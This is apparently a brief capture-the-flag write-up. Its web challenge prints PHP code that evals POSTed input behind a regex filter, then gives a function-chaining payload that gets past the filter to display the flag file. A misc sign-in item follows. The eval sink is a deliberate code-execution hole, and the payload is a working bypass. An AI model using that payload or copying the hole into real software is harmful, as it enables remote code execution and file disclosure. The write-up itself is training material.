web
Mercy-code
<?phphighlight_file(__FILE__);if ($_POST['cmd']) {$cmd = $_POST['cmd'];if (';' === preg_replace('/[a-z_]+\((?R)?\)/', '', $cmd)) {if (preg_match('/file|if|localeconv|phpversion|sqrt|et|na|nt|strlen|info|path|rand|dec|bin|hex|oct|pi|exp|log|var_dump|pos|current|array|time|se|ord/i', $cmd)) {die('What are you thinking?');} else {eval($cmd);}} else {die('Please calm down');}}
查看php代码发现是post无参rce,可以使用下列函数获取flag
cmd=echo(show_source(end(scandir(next(str_split(zend_version()))))));
misc
签到
公众号获取图片后依次点击即可获得flag
